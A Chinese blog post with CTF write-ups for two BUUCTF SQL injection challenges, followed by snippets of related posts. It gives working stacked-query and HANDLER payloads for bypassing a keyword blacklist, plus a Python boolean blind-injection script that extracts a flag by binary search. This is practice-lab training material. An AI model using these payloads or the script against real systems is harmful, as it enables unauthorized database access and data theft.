BUUCTF Web [GYCTF2020]Blacklist1 & [CISCN2019 华北赛区 Day2 Web1]Hack World1

于 2022-09-10 12:14:40 发布
阅读量184 收藏
点赞数
分类专栏: BUUCTF Web 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64558270/article/details/126794210
版权

[GYCTF2020]Blacklist1

启动靶机,点击查询

之前做过一道类似的( 可以看我之前写的 wp中的第二题 [强网杯 2019]随便注),这里就不啰嗦了,直接堆叠查询

1';show tables;#

 

发现了一个名叫FlagHere的表,看看有几列

1';show columns from `FlagHere`;#

 

 直接查flag

1';PREPARE dingzhen from concat('s','elect', ' * from `FlagHere` ');EXECUTE dingzhen;#

 被黑名单拦下了,看来本题使用拼接是绕不过黑名单的。尝试handler 命令查询

1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#

 拿到flag         flag{97ecce33-2493-460b-97b4-a7663f4d1670}

关于handler命令,可以看看这位大佬的文章mysql查询语句-handler_jesseyoung的博客-CSDN博客

[CISCN2019 华北赛区 Day2 Web1]Hack World1

启动靶机,发现提示说flag就在flag表里。先随便输入看看。经过几次测试,发现当输入为1,2的时候有正确回显,其他数字都会提示有错误

 再测试字母或字符发现提示

应该是数字型注入,加减乘除试一遍,发现只有/不会被过滤

 再测试发现=也不会被过滤

 既然=没有被过滤,直接就往bool盲注方向尝试,先尝试if语句是否被过滤

if(1=2,1,2)

 下面的会显语句对应值为2,看来可以通过if语句来实现bool盲注

if(ascii(substr((select(flag)from(flag)),1,1))=ascii('f'),1,2)

 

 回显果然是查询1对应的回显,编写脚本进行爆破(也可以使用burp的intruder进行爆破)

找个写好的脚本,把url换成当前靶机的url

import requests

url = 'http://9d75bf0c-9633-4ce2-89f5-50864a2c1452.node4.buuoj.cn:81/index.php'
result = ''

for x in range(1, 50):
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        payload = "if(ascii(substr((select(flag)from(flag)),%d,1))>%d,1,2)" % (x, mid)
        data = {
            "id":payload
        }
        response = requests.post(url, data = data)
        if 'Hello' in response.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2

    result += chr(int(mid))
    print(result)

运行

拿到flag           flag{0095d72f-41db-4964-89dd-697dd7332fc7}

WmVicmE=
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2021-8-10ctf的Hack World 1(sql异或布尔盲注入,fuzz测试waf词语方法,通常做ctfsql题目的思路)
qq_45290991的博客
08-10 719
今天这道题算是一个总结吧,其实不难,就是很多细节没有办法想到所以导致出了很多问题。最近也一些关于ctf的sql注入的简单题目,我总结了一下经验,主要从审题、确定注入类型(难点),构造绕过waf的payload几个方面进行讲解。 一、审题 这道题我审题就没做好,为何这么说呢? 首先,题目的意思是在flag表中查询flag列即可: 但是用脚指头想都知道不可能这么简单呀!这是一个post数据的网页,然后就按照常规思路来吧: 我输入1,2,返回了正常的问候“找女友屌丝系列”: 接着我就用了常
[buuctf][CISCN2019 华北赛区 Day2 Web1]Hack World
qq_37301470的博客
11-28 1065
[CISCN2019 华北赛区 Day2 Web1]Hack World 分析 打开环境发现这个 All You Want Is In Table 'flag' and the column is 'flag' 还有个输入框 随便输一个数字1 返回 Hello, glzjin wants a girlfriend. 肯定是sql注入没跑了,而且要查找flag表下的flag字段 由于提交前后url没有变化,所以是通过POST方法提交了参数id。 打开hackbar模拟post过程 发现输入3 or 1=1
web buuctf [CISCN2019 华北赛区 Day2 Web1]Hack World1
weixin_44214568的博客
03-20 1847
考点:盲注(布尔注入);异或的使用 1.输入1' 提示的是bool(错误),这里没有报错回显,只提示错误,其实就可以判断出是个布尔注入 2. 输入1' or '1=1'# 存在过滤,用bp抓包,fuzz进行爆破,看过滤了什么字符; (看回显,长度为482的都会提示sql注入,即被过滤的字符)这只能确定一部分,在实际操作中因为字符链接,字符本身都会产生新的过滤,注意一下 or的连接语句,空格等 3.根据提示 即从表flag的flag列内提取内容,根据前面的操作可知存在布尔注入,我
[CISCN2019 华北赛区 Day2 Web1]Hack World 1
qq_43618536的博客
07-03 537
BUUCTF的[CISCN2019 华北赛区 Day2 Web1]Hack World 1 盲注
BUUCTF WEB Hack World1
qq_41696858的博客
10-19 2029
经典脚本爆破 打开场景,发现一个输入框,提示要输入数字,鉴于题目上有明确提示,sql注入 那么我们先试试,输入纯数字 输入0回显Error Occured When Fetch Result. 输入1回显Hello, glzjin wants a girlfriend. 输入2回显Do you want to be my girlfriend? 输入大于2的数回显:Error Occured When Fetch Result. 目测是由数字判断回显类型,且有不同回显,就怕不回显呢,那么考虑bool盲注 下
BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World 1
weixin_45642610的博客
01-18 358
BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World buu 限制访问频率所以要时间间隔久点 改这个函数time.sleep(0.1) import requests import time import re url='http://2c82f86e-108a-4aa5-b1d2-49fc08b0f2f9.node3.buuoj.cn/index.php' flag = '' for i in range(1,50): max = 127 min = 0
BUUCTF-WEB-[GYCTF2020]Blacklist
r1727337824的博客
08-29 802
<hr style=" border:solid; width:100px; height:1px;" color=#000000 size=1">
[GYCTF2020]Blacklist 1+[GXYCTF2019]BabySQli 1
bazzza的博客
12-23 303
blacklist 拿到题先试下能不能注入 ?inject=1%27%20or%201=1%20--%20q 存在注入,接着使用order by判断字段,发现字段数为2,但在接一步的注入中,出现提示,遇到阻拦。 这个地方使用正则过滤了一些关键字,在尝试绕过的时候也失败了,但是他这个地方没有过滤 ; 和extractxml(),可以先报错注入拿到库名,然后再进行堆叠注入,(直接用show database()会分不清是哪个表) 报错注入报当前库名 ?inject=1%27%20and%20extract
[CISCN 2019 初赛]Love Math 1
qq_53460654的博客
05-28 601
打开环境 <?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); } $blacklist = [' ', '\t',
BUUCTF-WEB刷题记录-1
weixin_44145820的博客
04-06 896
目录[HCTF 2018]WarmUp[强网杯 2019]随便注[护网杯 2018]easy_tornado[SUCTF 2019]EasySQL[HCTF 2018]admin[RoarCTF 2019]Easy Calc[极客大挑战 2019]EasySQL[强网杯 2019]高明的黑客[极客大挑战 2019]Havefun[SUCTF 2019]CheckIn[CISCN2019 华北赛区 ...
BUUCTF-WEB
ccfly1012的博客
11-02 3856
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
[CISCN2019 华北赛区 Day2 Web1]Hack World1
weixin_45808483的博客
01-22 1279
启动环境 题目地址:BUUCTF在线评测 首页提示flag位于flag表的flag字段 直接输入 ;select flag from flag; 显示sql注入检测 单独输入select关键字没有被过滤,说明过滤了空格 使用语句 ;select(flag)from(flag); 因为题目提示flag为uuid,uuid是32位随机字符串,所以需要编写python脚本来获取flag 先写出一个核心的语句,判断flag的第一个字符是否ascii码为101 ...
[CISCN2019 华北赛区]Hack World 1
学生
05-25 205
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 经过测试为布尔盲注 此例不使用二分法 经过fuzzing测试 ascii没有被过滤,substr也没有!!空格被过滤可以使用()代替,,<>也没有被过滤,=也没有 爆数据库 payload (ascii(substr(database(),%d,1))=%d) 其中%d为变量 题目提示在flag表中flag字段就是我们想要的东西 构造payload data = {"id": "(ascii(substr((sel
buuctf-web-[CISCN2019 华北赛区 Day2 Web1]Hack World
weixin_43345082的博客
08-10 4171
一个盲注过滤了很多东西 最后发现这样可以正常回显 id=1^(if((ascii(substr((select(flag)from(flag)),1,1))=102),sleep(3),1)) 写脚本一位位爆破,二分法找 但是因为平台的问题可能跑到一半会被限制,可以加sleep()时间或者从从下一位继续跑 #!/usr/bin/python #-*-coding:utf-8 -*- import ...
[CISCN2019 华北赛区 Day2 Web1]Hack World
沐目的博客
10-21 9096
1.测试过滤 我想到到了: 联合注入:unin被过滤 报错注入:and、or、updatexml被过滤 bool注入和time注入:and、or被过滤 可以通过fuzz测试(模糊测试),发现哪些字符被过滤了。length为482的,全都是被过滤的。 然后就在网上学了一些技巧: 利用/*!union*/可以绕过对union的过滤,虽然这题不能用,但是记一下吧。 2.异或 这东西和那个堆叠注入一样...
buuctfhack world wp
m0_55185160的博客
08-16 332
打开网页我们可以得到表名和列名都为flag 在输入框内输入1得到 输入2得到 输入3时 发现报错于是尝试注入 1 union select 1,2 发现受限制我们进行一个fuzz测试 长度为460的都是被过滤的 看了大佬的方法发现这里运用sql三目运算 if(表达式1,表达式2,表达式3)如果表达式1正确,执行表达式2,否则执行表达式3 if(ascil(substr((select(flag)from(flag)),%d,1))>%d,1,2)''%(x,mid) 用大佬的...
HP工作站Z1G9安装Ubuntu20.4与4060显卡驱动教程
通过编辑`/etc/modprobe.d/blacklist.conf`文件,添加`blacklist nouveau`和`options nouveau modeset=0`这两行,然后重启系统。检查`lspci | grep nouveau`命令的结果,如果没有输出,表示Nouveau已被成功禁用。 2...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

WmVicmE=

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值